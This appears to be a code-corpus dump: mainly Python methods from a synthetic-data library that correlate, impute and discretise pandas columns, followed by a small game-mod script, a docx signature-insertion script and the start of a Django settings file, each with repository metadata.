if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
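    # --- Editor's note: a minimal sketch (not part of the original source) of the join above; the two
    # series and the separator are illustrative only:
    #   forename = pd.Series(['Ada', 'Alan'])
    #   surname = pd.Series(['Lovelace', 'Turing'])               # stands in for the action result
    #   pd.Series([f"{a} {b}" for a, b in zip(forename, surname)])  # -> 'Ada Lovelace', 'Alan Turing'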
def _correlate_sigmoid(self, canonical: Any, header: str, precision: int=None, seed: int=None,
rtn_type: str=None):
""" logistic sigmoid a.k.a logit, takes an array of real numbers and transforms them to a value
between (0,1) and is defined as
f(x) = 1/(1+exp(-x)
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param precision: (optional) how many decimal places. default to 3
:param seed: (optional) the random seed. defaults to current datetime
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: an equal length list of correlated values
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
precision = precision if isinstance(precision, int) else 3
_seed = seed if isinstance(seed, int) else self._seed()
rtn_values = np.round(1 / (1 + np.exp(-s_values)), precision)
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
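    # --- Editor's note: a minimal sketch (not part of the original source) of the sigmoid transform
    # this method applies, on an illustrative series:
    #   s = pd.Series([-2.0, 0.0, 2.0])
    #   np.round(1 / (1 + np.exp(-s)), 3)                         # -> 0.119, 0.500, 0.881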
def _correlate_polynomial(self, canonical: Any, header: str, coefficient: list, seed: int=None,
rtn_type: str=None, keep_zero: bool=None) -> list:
""" creates a polynomial using the reference header values and apply the coefficients where the
index of the list represents the degree of the term in reverse order.
e.g [6, -2, 0, 4] => f(x) = 4x**3 - 2x + 6
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param coefficient: the reverse list of term coefficients
:param seed: (optional) the random seed. defaults to current datetime
:param keep_zero: (optional) if True then zeros passed remain zero, Default is False
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: an equal length list of correlated values
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
keep_zero = keep_zero if isinstance(keep_zero, bool) else False
_seed = seed if isinstance(seed, int) else self._seed()
def _calc_polynomial(x, _coefficient):
if keep_zero and x == 0:
return 0
res = 0
for index, coeff in enumerate(_coefficient):
res += coeff * x ** index
return res
rtn_values = s_values.apply(lambda x: _calc_polynomial(x, coefficient))
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
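    # --- Editor's note: a minimal sketch (not part of the original source) of the polynomial evaluation
    # above, with coefficients indexed by degree (constant term first):
    #   coefficient = [6, -2, 0, 4]                               # f(x) = 4x**3 - 2x + 6
    #   f = lambda x: sum(c * x ** i for i, c in enumerate(coefficient))
    #   f(2)                                                      # -> 34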
def _correlate_missing(self, canonical: Any, header: str, granularity: [int, float]=None,
as_type: str=None, lower: [int, float]=None, upper: [int, float]=None, nulls_list: list=None,
exclude_dominant: bool=None, replace_zero: [int, float]=None, precision: int=None,
day_first: bool=None, year_first: bool=None, seed: int=None,
rtn_type: str=None):
""" imputes missing data with a weighted distribution based on the analysis of the other elements in the
column
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param granularity: (optional) the granularity of the analysis across the range. Default is 5
int passed - represents the number of periods
float passed - the length of each interval
list[tuple] - specific interval periods e.g []
list[float] - the percentile or quantities, All should fall between 0 and 1
:param as_type: (optional) specify the type to analyse
:param lower: (optional) the lower limit of the number value. Default min()
:param upper: (optional) the upper limit of the number value. Default max()
:param nulls_list: (optional) a list of nulls that should be considered null
:param exclude_dominant: (optional) if overly dominant are to be excluded from analysis to avoid bias (numbers)
:param replace_zero: (optional) with categories, a non-zero minimal chance relative frequency to replace zero
This is useful when the relative frequency of a category is so small the analysis returns zero
:param precision: (optional) by default set to 3.
:param day_first: (optional) if the date provided has day first
:param year_first: (optional) if the date provided has year first
:param seed: (optional) the random seed. defaults to current datetime
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return:
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
as_type = as_type if isinstance(as_type, str) else s_values.dtype.name
_seed = seed if isinstance(seed, int) else self._seed()
nulls_list = nulls_list if isinstance(nulls_list, list) else [np.nan, None, 'nan', '', ' ']
if isinstance(nulls_list, list):
s_values.replace(nulls_list, np.nan, inplace=True, regex=True)
null_idx = s_values[s_values.isna()].index
if as_type.startswith('int') or as_type.startswith('float') or as_type.startswith('num'):
_analysis = DataAnalytics(DataDiscovery.analyse_number(s_values, granularity=granularity, lower=lower,
upper=upper, detail_stats=False, precision=precision,
exclude_dominant=exclude_dominant))
s_values.iloc[null_idx] = self._get_intervals(intervals=[tuple(x) for x in _analysis.intent.intervals],
relative_freq=_analysis.patterns.relative_freq,
precision=_analysis.params.precision,
seed=_seed, size=len(null_idx))
elif as_type.startswith('cat'):
_analysis = DataAnalytics(DataDiscovery.analyse_category(s_values, replace_zero=replace_zero))
s_values.iloc[null_idx] = self._get_category(selection=_analysis.intent.categories,
relative_freq=_analysis.patterns.relative_freq,
seed=_seed, size=len(null_idx))
elif as_type.startswith('date'):
_analysis = DataAnalytics(DataDiscovery.analyse_date(s_values, granularity=granularity, lower=lower,
upper=upper, day_first=day_first,
year_first=year_first))
s_values.iloc[null_idx] = self._get_datetime(start=_analysis.intent.lowest,
until=_analysis.intent.highest,
relative_freq=_analysis.patterns.relative_freq,
date_format=_analysis.params.data_format,
day_first=_analysis.params.day_first,
year_first=_analysis.params.year_first,
seed=_seed, size=len(null_idx))
else:
raise ValueError(f"The data type '{as_type}' is not supported. Try using the 'as_type' parameter")
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
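    # --- Editor's note: a hypothetical sketch (not part of the original source) of the imputation idea
    # above for a categorical column: nulls are replaced in proportion to the observed frequencies:
    #   s = pd.Series(['A', 'A', 'B', None])
    #   freq = s.value_counts(normalize=True)
    #   rng = np.random.default_rng(42)
    #   s[s.isna()] = rng.choice(freq.index, size=s.isna().sum(), p=freq.values)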
def _correlate_numbers(self, canonical: Any, header: str, to_numeric: bool=None, standardize: bool=None,
normalize: tuple=None, offset: [int, float, str]=None, jitter: float=None,
jitter_freq: list=None, precision: int=None, replace_nulls: [int, float]=None,
seed: int=None, keep_zero: bool=None, min_value: [int, float]=None,
max_value: [int, float]=None, rtn_type: str=None):
""" returns a number that correlates to the value given. The jitter is based on a normal distribution
with the correlated value being the mean and the jitter its standard deviation from that mean
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
        :param to_numeric: (optional) ensures numeric type. Non-convertible strings are set to null
:param standardize: (optional) if the column should be standardised
:param normalize: (optional) normalise the column between two values. the tuple is the lower and upper bounds
        :param offset: (optional) a fixed value to offset by or, if a str, an operation to perform using '@' as the header value.
:param jitter: (optional) a perturbation of the value where the jitter is a std. defaults to 0
:param jitter_freq: (optional) a relative freq with the pattern mid point the mid point of the jitter
:param precision: (optional) how many decimal places. default to 3
:param replace_nulls: (optional) a numeric value to replace nulls
:param seed: (optional) the random seed. defaults to current datetime
:param keep_zero: (optional) if True then zeros passed remain zero, Default is False
:param min_value: a minimum value not to go below
:param max_value: a max value not to go above
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: an equal length list of correlated values
The offset can be a numeric offset that is added to the value, e.g. passing 2 will add 2 to all values.
If a string is passed if format should be a calculation with the '@' character used to represent the column
value. e.g.
'1-@' would subtract the column value from 1,
'@*0.5' would multiply the column value by 0.5
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
s_values = canonical[header].copy()
if s_values.empty:
return list()
if isinstance(to_numeric, bool) and to_numeric:
s_values = pd.to_numeric(s_values.apply(str).str.replace('[$£€, ]', '', regex=True), errors='coerce')
if not (s_values.dtype.name.startswith('int') or s_values.dtype.name.startswith('float')):
raise ValueError(f"The header column is of type '{s_values.dtype.name}' and not numeric. "
f"Use the 'to_numeric' parameter if appropriate")
keep_zero = keep_zero if isinstance(keep_zero, bool) else False
precision = precision if isinstance(precision, int) else 3
_seed = seed if isinstance(seed, int) else self._seed()
if isinstance(replace_nulls, (int, float)):
s_values[s_values.isna()] = replace_nulls
null_idx = s_values[s_values.isna()].index
zero_idx = s_values.where(s_values == 0).dropna().index if keep_zero else []
if isinstance(offset, (int, float)) and offset != 0:
s_values = s_values.add(offset)
elif isinstance(offset, str):
offset = offset.replace("@", 'x')
s_values = s_values.apply(lambda x: eval(offset))
if isinstance(jitter, (int, float)) and jitter != 0:
sample = self._get_number(-abs(jitter) / 2, abs(jitter) / 2, relative_freq=jitter_freq,
size=s_values.size, seed=_seed)
s_values = s_values.add(sample)
if isinstance(min_value, (int, float)):
if min_value < s_values.max():
min_idx = s_values.dropna().where(s_values < min_value).dropna().index
s_values.iloc[min_idx] = min_value
else:
raise ValueError(f"The min value {min_value} is greater than the max result value {s_values.max()}")
if isinstance(max_value, (int, float)):
if max_value > s_values.min():
max_idx = s_values.dropna().where(s_values > max_value).dropna().index
s_values.iloc[max_idx] = max_value
else:
raise ValueError(f"The max value {max_value} is less than the min result value {s_values.min()}")
if isinstance(standardize, bool) and standardize:
s_values = pd.Series(Commons.list_standardize(s_values.to_list()))
if isinstance(normalize, tuple):
            if len(normalize) != 2 or normalize[0] >= normalize[1]:
                raise ValueError("The normalize tuple must be of size 2 with the first value lower than the second")
s_values = pd.Series(Commons.list_normalize(s_values.to_list(), normalize[0], normalize[1]))
# reset the zero values if any
s_values.iloc[zero_idx] = 0
s_values = s_values.round(precision)
if precision == 0 and not s_values.isnull().any():
s_values = s_values.astype(int)
if null_idx.size > 0:
s_values.iloc[null_idx] = np.nan
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
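    # --- Editor's note: a hypothetical sketch (not part of the original source) of the str offset and the
    # jitter above; a plain uniform draw stands in here for the internal _get_number call:
    #   s = pd.Series([10.0, 20.0, 30.0])
    #   s.apply(lambda x: eval('1-@'.replace('@', 'x')))          # offset='1-@'  -> 1 - value
    #   rng = np.random.default_rng(42)
    #   (s + rng.uniform(-0.5, 0.5, size=s.size)).round(3)        # jitter=1 drawn from +/- jitter/2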
def _correlate_categories(self, canonical: Any, header: str, correlations: list, actions: dict,
default_action: [str, int, float, dict]=None, seed: int=None, rtn_type: str=None):
""" correlation of a set of values to an action, the correlations must map to the dictionary index values.
Note. to use the current value in the passed values as a parameter value pass an empty dict {} as the keys
value. If you want the action value to be the current value of the passed value then again pass an empty dict
action to be the current value
simple correlation list:
['A', 'B', 'C'] # if values is 'A' then action is 0 and so on
multiple choice correlation:
[['A','B'], 'C'] # if values is 'A' OR 'B' then action is 0 and so on
For more complex correlation the selection logic can be used, see notes below.
for actions also see notes below.
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
        :param correlations: a list of categories (can also contain lists for multiple correlations).
:param actions: the correlated set of categories that should map to the index
:param default_action: (optional) a default action to take if the selection is not fulfilled
:param seed: a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
        that executes an intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection: ['M', 'F', 'U']}
This same action using the helper method would look like:
inst.action2dict(method='get_category', selection=['M', 'F', 'U'])
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = seed if isinstance(seed, int) else self._seed()
actions = deepcopy(actions)
correlations = deepcopy(correlations)
corr_list = []
for corr in correlations:
corr_list.append(Commons.list_formatter(corr))
if not isinstance(default_action, (str, int, float, dict)):
default_action = None
rtn_values = self._apply_action(canonical, action=default_action, seed=_seed)
# deal with categories
if rtn_values.dtype.name == 'category':
rtn_values = rtn_values.astype('object')
s_values = canonical[header].copy().astype(str)
for i in range(len(corr_list)):
action = actions.get(i, actions.get(str(i), -1))
if action == -1:
continue
if isinstance(corr_list[i][0], dict):
corr_idx = self._selection_index(canonical, selection=corr_list[i])
else:
corr_idx = s_values[s_values.isin(map(str, corr_list[i]))].index
rtn_values.update(self._apply_action(canonical, action=action, select_idx=corr_idx, seed=_seed))
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
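    # --- Editor's note: a minimal sketch (not part of the original source) of the correlation/action
    # mapping above with a simple correlations list; values are illustrative only:
    #   s = pd.Series(['A', 'B', 'C', 'A'])
    #   out = pd.Series('default', index=s.index)
    #   out[s.isin(['A', 'B'])] = 'group-1'                       # correlations[0] = ['A', 'B'] -> actions[0]
    #   out[s.isin(['C'])] = 'group-2'                            # correlations[1] = 'C'        -> actions[1]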
def _correlate_dates(self, canonical: Any, header: str, offset: [int, dict]=None, jitter: int=None,
jitter_units: str=None, jitter_freq: list=None, now_delta: str=None, date_format: str=None,
min_date: str=None, max_date: str=None, fill_nulls: bool=None, day_first: bool=None,
year_first: bool=None, seed: int=None, rtn_type: str=None):
""" correlates dates to an existing date or list of dates. The return is a list of pd
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
        :param offset: (optional) an offset to the date. if int then assumed a 'days' offset
                    int or dictionary of units associated with pd.DateOffset, e.g. {'days': 1}
:param jitter: (optional) the random jitter or deviation in days
:param jitter_units: (optional) the units of the jitter, Options: 'W', 'D', 'h', 'm', 's'. default 'D'
:param jitter_freq: (optional) a relative freq with the pattern mid point the mid point of the jitter
:param now_delta: (optional) returns a delta from now as an int list, Options: 'Y', 'M', 'W', 'D', 'h', 'm', 's'
        :param min_date: (optional) a minimum date not to go below
        :param max_date: (optional) a max date not to go above
        :param fill_nulls: (optional) if null date values should remain untouched or be filled with the modal date
:param day_first: (optional) if the dates given are day first format. Default to True
:param year_first: (optional) if the dates given are year first. Default to False
:param date_format: (optional) the format of the output
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal size to that given
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
values = canonical[header].copy()
if values.empty:
return list()
def _clean(control):
_unit_type = ['years', 'months', 'weeks', 'days', 'leapdays', 'hours', 'minutes', 'seconds']
_params = {}
if isinstance(control, int):
control = {'days': control}
if isinstance(control, dict):
for k, v in control.items():
if k not in _unit_type:
raise ValueError(f"The key '{k}' in 'offset', is not a recognised unit type for pd.DateOffset")
return control
_seed = self._seed() if seed is None else seed
fill_nulls = False if fill_nulls is None or not isinstance(fill_nulls, bool) else fill_nulls
offset = _clean(offset) if isinstance(offset, (dict, int)) else None
if isinstance(now_delta, str) and now_delta not in ['Y', 'M', 'W', 'D', 'h', 'm', 's']:
raise ValueError(f"the now_delta offset unit '{now_delta}' is not recognised "
f"use of of ['Y', 'M', 'W', 'D', 'h', 'm', 's']")
units_allowed = ['W', 'D', 'h', 'm', 's']
jitter_units = jitter_units if isinstance(jitter_units, str) and jitter_units in units_allowed else 'D'
jitter = pd.Timedelta(value=jitter, unit=jitter_units) if isinstance(jitter, int) else None
# set minimum date
_min_date = pd.to_datetime(min_date, errors='coerce', infer_datetime_format=True, utc=True)
if _min_date is None or _min_date is pd.NaT:
_min_date = pd.to_datetime(pd.Timestamp.min, utc=True)
# set max date
_max_date = pd.to_datetime(max_date, errors='coerce', infer_datetime_format=True, utc=True)
if _max_date is None or _max_date is pd.NaT:
_max_date = pd.to_datetime(pd.Timestamp.max, utc=True)
if _min_date >= _max_date:
raise ValueError(f"the min_date {min_date} must be less than max_date {max_date}")
# convert values into datetime
s_values = pd.Series(pd.to_datetime(values.copy(), errors='coerce', infer_datetime_format=True,
dayfirst=day_first, yearfirst=year_first, utc=True))
if jitter is not None:
if jitter_units in ['W', 'D']:
value = jitter.days
zip_units = 'D'
else:
value = int(jitter.to_timedelta64().astype(int) / 1000000000)
zip_units = 's'
zip_spread = self._get_number(-abs(value) / 2, (abs(value + 1) / 2), relative_freq=jitter_freq,
precision=0, size=s_values.size, seed=_seed)
zipped_dt = list(zip(zip_spread, [zip_units]*s_values.size))
s_values += np.array([pd.Timedelta(x, y).to_timedelta64() for x, y in zipped_dt])
if fill_nulls:
generator = np.random.default_rng(seed=_seed)
s_values = s_values.fillna(generator.choice(s_values.mode()))
null_idx = s_values[s_values.isna()].index
if isinstance(offset, dict) and offset:
s_values = s_values.add(pd.DateOffset(**offset))
if _min_date > pd.to_datetime(pd.Timestamp.min, utc=True):
            if _min_date < s_values.max():
min_idx = s_values.dropna().where(s_values < _min_date).dropna().index
s_values.iloc[min_idx] = _min_date
else:
raise ValueError(f"The min value {min_date} is greater than the max result value {s_values.max()}")
if _max_date < pd.to_datetime(pd.Timestamp.max, utc=True):
            if _max_date > s_values.min():
max_idx = s_values.dropna().where(s_values > _max_date).dropna().index
s_values.iloc[max_idx] = _max_date
else:
raise ValueError(f"The max value {max_date} is less than the min result value {s_values.min()}")
if now_delta:
s_values = (s_values.dt.tz_convert(None) - pd.Timestamp('now')).abs()
s_values = (s_values / np.timedelta64(1, now_delta))
s_values = s_values.round(0) if null_idx.size > 0 else s_values.astype(int)
else:
if isinstance(date_format, str):
s_values = s_values.dt.strftime(date_format)
else:
s_values = s_values.dt.tz_convert(None)
if null_idx.size > 0:
                s_values.iloc[null_idx] = np.nan
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
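    # --- Editor's note: a hypothetical sketch (not part of the original source) of the date offset and
    # jitter above; a simple +/- 2 day integer draw stands in for the internal jitter logic:
    #   s = pd.to_datetime(pd.Series(['2021-01-01', '2021-06-01']))
    #   s + pd.DateOffset(days=1)                                 # the 'offset' step
    #   rng = np.random.default_rng(42)
    #   s + pd.to_timedelta(rng.integers(-2, 3, size=s.size), unit='D')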
def _correlate_discrete(self, canonical: Any, header: str, granularity: [int, float, list]=None,
lower: [int, float]=None, upper: [int, float]=None, categories: list=None,
precision: int=None, seed: int=None) -> list:
""" converts continuous representation into discrete representation through interval categorisation
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header in the DataFrame to correlate
:param granularity: (optional) the granularity of the analysis across the range. Default is 3
int passed - represents the number of periods
float passed - the length of each interval
list[tuple] - specific interval periods e.g []
list[float] - the percentile or quantities, All should fall between 0 and 1
:param lower: (optional) the lower limit of the number value. Default min()
:param upper: (optional) the upper limit of the number value. Default max()
:param precision: (optional) The precision of the range and boundary values. by default set to 5.
:param categories:(optional) a set of labels the same length as the intervals to name the categories
:return: a list of equal size to that given
"""
# exceptions check
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = seed if isinstance(seed, int) else self._seed()
        # intent code block on the canonical
granularity = 3 if not isinstance(granularity, (int, float, list)) or granularity == 0 else granularity
precision = precision if isinstance(precision, int) else 5
# firstly get the granularity
lower = canonical[header].min() if not isinstance(lower, (int, float)) else lower
upper = canonical[header].max() if not isinstance(upper, (int, float)) else upper
if lower >= upper:
upper = lower
granularity = [(lower, upper, 'both')]
if isinstance(granularity, (int, float)):
# if granularity float then convert frequency to intervals
if isinstance(granularity, float):
# make sure frequency goes beyond the upper
_end = upper + granularity - (upper % granularity)
periods = pd.interval_range(start=lower, end=_end, freq=granularity).drop_duplicates()
periods = periods.to_tuples().to_list()
granularity = []
while len(periods) > 0:
period = periods.pop(0)
if len(periods) == 0:
granularity += [(period[0], period[1], 'both')]
else:
granularity += [(period[0], period[1], 'left')]
# if granularity int then convert periods to intervals
else:
periods = pd.interval_range(start=lower, end=upper, periods=granularity).drop_duplicates()
granularity = periods.to_tuples().to_list()
if isinstance(granularity, list):
if all(isinstance(value, tuple) for value in granularity):
if len(granularity[0]) == 2:
granularity[0] = (granularity[0][0], granularity[0][1], 'both')
granularity = [(t[0], t[1], 'right') if len(t) == 2 else t for t in granularity]
elif all(isinstance(value, float) and 0 < value < 1 for value in granularity):
quantiles = list(set(granularity + [0, 1.0]))
boundaries = canonical[header].quantile(quantiles).values
boundaries.sort()
granularity = [(boundaries[0], boundaries[1], 'both')]
granularity += [(boundaries[i - 1], boundaries[i], 'right') for i in range(2, boundaries.size)]
else:
                granularity = [(lower, upper, 'both')]
granularity = [(np.round(p[0], precision), np.round(p[1], precision), p[2]) for p in granularity]
# now create the categories
conditions = []
for interval in granularity:
lower, upper, closed = interval
if str.lower(closed) == 'neither':
conditions.append((canonical[header] > lower) & (canonical[header] < upper))
elif str.lower(closed) == 'right':
conditions.append((canonical[header] > lower) & (canonical[header] <= upper))
elif str.lower(closed) == 'both':
conditions.append((canonical[header] >= lower) & (canonical[header] <= upper))
else:
conditions.append((canonical[header] >= lower) & (canonical[header] < upper))
if isinstance(categories, list) and len(categories) == len(conditions):
choices = categories
else:
if canonical[header].dtype.name.startswith('int'):
choices = [f"{int(i[0])}->{int(i[1])}" for i in granularity]
else:
choices = [f"{i[0]}->{i[1]}" for i in granularity]
# noinspection PyTypeChecker
return np.select(conditions, choices, default="<NA>").tolist()
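    # --- Editor's note: a minimal sketch (not part of the original source) of the interval categorisation
    # above using np.select; the bins are illustrative only:
    #   s = pd.Series([3, 12, 25])
    #   conditions = [(s >= 0) & (s <= 10), (s > 10) & (s <= 20)]
    #   np.select(conditions, ['0->10', '10->20'], default='<NA>')   # -> '0->10', '10->20', '<NA>'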
"""
UTILITY METHODS SECTION
"""
@staticmethod
def _convert_date2value(dates: Any, day_first: bool = True, year_first: bool = False):
values = pd.to_datetime(dates, errors='coerce', infer_datetime_format=True, dayfirst=day_first,
yearfirst=year_first)
return mdates.date2num(pd.Series(values)).tolist()
@staticmethod
def _convert_value2date(values: Any, date_format: str=None):
dates = []
for date in mdates.num2date(values):
date = pd.Timestamp(date)
if isinstance(date_format, str):
date = date.strftime(date_format)
dates.append(date)
return dates
@staticmethod
def _freq_dist_size(relative_freq: list, size: int, seed: int=None):
""" utility method taking a list of relative frequencies and based on size returns the size distribution
of element based on the frequency. The distribution is based upon binomial distributions
:param relative_freq: a list of int or float values representing a relative distribution frequency
:param size: the size to be distributed
:param seed: (optional) a seed value for the random function: default to None
:return: an integer list of the distribution that sum to the size
"""
if not isinstance(relative_freq, list) or not all(isinstance(x, (int, float)) for x in relative_freq):
raise ValueError("The weighted pattern must be an list of numbers")
seed = seed if isinstance(seed, int) else int(time.time() * np.random.random())
if sum(relative_freq) != 1:
relative_freq = np.round(relative_freq / np.sum(relative_freq), 5)
generator = np.random.default_rng(seed=seed)
result = list(generator.binomial(n=size, p=relative_freq, size=len(relative_freq)))
diff = size - sum(result)
adjust = [0] * len(relative_freq)
if diff != 0:
unit = diff / sum(relative_freq)
for idx in range(len(relative_freq)):
adjust[idx] = int(round(relative_freq[idx] * unit, 0))
result = [a + b for (a, b) in zip(result, adjust)]
# There is a possibility the required size is not fulfilled, therefore add or remove elements based on freq
def _freq_choice(p: list):
"""returns a single index of the choice of the relative frequency"""
rnd = generator.random() * sum(p)
for i, w in enumerate(p):
rnd -= w
if rnd < 0:
return i
while sum(result) != size:
if sum(result) < size:
result[_freq_choice(relative_freq)] += 1
else:
weight_idx = _freq_choice(relative_freq)
if result[weight_idx] > 0:
result[weight_idx] -= 1
# ensure we have all positive values
return [0 if x < 0 else x for x in result]
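    # --- Editor's note: a minimal sketch (not part of the original source) of the binomial split above:
    # a size is distributed across normalised frequencies, then any drift is reconciled back to size:
    #   rng = np.random.default_rng(42)
    #   freq = np.array([0.5, 0.3, 0.2])
    #   parts = rng.binomial(n=100, p=freq)                        # e.g. roughly [50, 30, 20]
    #   100 - parts.sum()                                          # remainder the method redistributes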
@staticmethod
def _seed(seed: int=None, increment: bool=False):
if not isinstance(seed, int):
return int(time.time() * np.random.default_rng().random())
if increment:
seed += 1
if seed > 2 ** 31:
seed = int(time.time() * np.random.default_rng(seed=seed-1).random())
return seed
|
[
"darryl@aistac.net"
] |
darryl@aistac.net
|
faec0609802a89c78e7a68440c366cb65f7aae9e
|
dfd312b460385d72721389ee337ef4ca63af9106
|
/Craftgame/example_mod.py
|
99790525c9a94e41eb10f73ca4b9f0e5c9212584
|
[] |
no_license
|
Alex2772/Craftgame
|
1e7b04242f274099668fb5aa99976d67c0c415d2
|
7c13a585da4ee00242113f851ad3d38a9e26c3b5
|
refs/heads/unstable
| 2021-10-24T17:36:36.163729
| 2021-09-26T14:05:01
| 2021-09-26T14:05:01
| 138,429,074
| 13
| 6
| null | 2019-11-26T21:24:19
| 2018-06-23T19:46:45
|
C++
|
UTF-8
|
Python
| false
| false
| 259
|
py
|
import cge
import logger
@cge.CGEMod("My mod", "mm", "1.0.0")
class MyMod:
def __init__(self):
#cge.registerEventHandler(self, self.render_screen, "craftgame:render_screen_bg/pre")
cge.connectToServer("alex2772.ru", 24565)
def init():
mod = MyMod()
|
[
"alex2772sc@gmail.com"
] |
alex2772sc@gmail.com
|
270da1094f20a8b3a2a9eb8995a7b33d8f52109a
|
c7851c362e66d23690783844828a5f82f3626d11
|
/solution/web/add_sign.py
|
09009d03ba437f6a3068e08426a070eeef3c6e8d
|
[] |
no_license
|
obydenkova/Aviahackathon2021
|
194aff7b545e0b3882a96a55e0204ae3f844a542
|
b6972a1aca842a707f61d53c1d4f40f68fb0335f
|
refs/heads/main
| 2023-04-22T16:18:21.854554
| 2021-05-04T21:47:07
| 2021-05-04T21:47:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
from docxtpl import DocxTemplate, InlineImage
import logging
def sign_doc(name):
name_of_doc = "../docx_template/consent_personal_data_" + name + ".docx"
doc = DocxTemplate(name_of_doc)
logging.info(name_of_doc + " opened")
sign_img = InlineImage(doc, 'signature_resized.png')
context = {'place_to_sign': sign_img}
doc.render(context)
name_to_save = "consent_personal_data_" + name + "_signed" + ".docx"
doc.save(name_to_save)
logging.info(name_to_save + " signed and saved successfully")
if __name__ == "__main__":
name = "Вася Пупкин"
logging.basicConfig(filename='app.log', filemode='a', format='%(asctime)s - %(message)s', level=logging.INFO)
logging.info('Send request to SIGN doc file for ' + name)
sign_doc(name)
|
[
"noreply@github.com"
] |
obydenkova.noreply@github.com
|
23203158c06d57c816948414563a0d3b5f88c812
|
9633d418f303db848a8aac382ecb74fd0d9361d4
|
/foreigncurrency/settings.py
|
5b90311fe343a7f072a7a6fd045cbedd8a36a648
|
[] |
no_license
|
carolinasitorus/foreign-currency
|
0638d286268912cdf9843fd25138752c396a6331
|
6259bb8eafb2966920adbf29949673484ca2bcb7
|
refs/heads/master
| 2020-03-24T04:37:10.936250
| 2018-07-31T19:02:01
| 2018-07-31T19:02:01
| 142,459,228
| 0
| 1
| null | 2018-07-31T18:59:51
| 2018-07-26T15:23:11
|
Python
|
UTF-8
|
Python
| false
| false
| 4,051
|
py
|
"""
Django settings for foreigncurrency project.
Generated by 'django-admin startproject' using Django 2.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
